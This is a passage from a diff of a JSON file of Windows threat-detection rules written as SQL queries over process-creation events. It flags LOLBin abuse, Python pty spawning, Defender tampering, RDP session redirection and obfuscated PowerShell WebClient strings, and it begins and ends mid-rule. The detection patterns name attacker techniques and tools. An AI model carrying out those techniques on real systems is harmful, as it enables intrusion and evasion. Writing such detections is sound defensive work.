"Use of VSIISExeLauncher.exe", + "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "status": "experimental", + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate use of net.exe utility by legitimate user" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '%view%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_share_and_sessions_enum.yml" + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", - "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", - "tags": [ - "attack.collection", - "attack.t1560.001" - ], + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "status": "experimental", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", - "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", + "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "status": "test", + "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", + "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.t1218", + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "The process spawned by vsjitdebugger.exe is uncommon." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" }, { - "title": "Detected Windows Software Discovery", - "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "title": "Audio Capture via SoundRecorder", + "id": "83865853-59aa-449e-9600-74b9d89a6d6e", "status": "test", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "description": "Detect attacker collecting audio via SoundRecorder application.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate audio capture by legitimate user." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_software_discovery.yml" + "filename": "proc_creation_win_soundrecorder_audio_capture.yml" }, { - "title": "Arbitrary Binary Execution Using GUP Utility", - "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", - "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Imports Registry Key From a File", + "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "status": "test", + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.execution" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Other parent binaries using GUP not currently identified" + "Legitimate import of keys", + "Evernote" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\gup.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" ], - "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" + "filename": "proc_creation_win_regedit_import_keys.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "status": "experimental", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1059.001" + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", - "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", - "author": "frack113", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Sysinternals PsService Execution", - "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", - "status": "experimental", - "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "status": "test", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.persistence", - "attack.t1543.003" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Legitimate use of PsService by an administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psservice.exe' OR (NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psservice.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Defrag Deactivation", - "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005", - "attack.s0111" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_slingshot.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", + "title": "Potential Windows Defender Tampering Via Wmic.EXE", + "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003" + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE 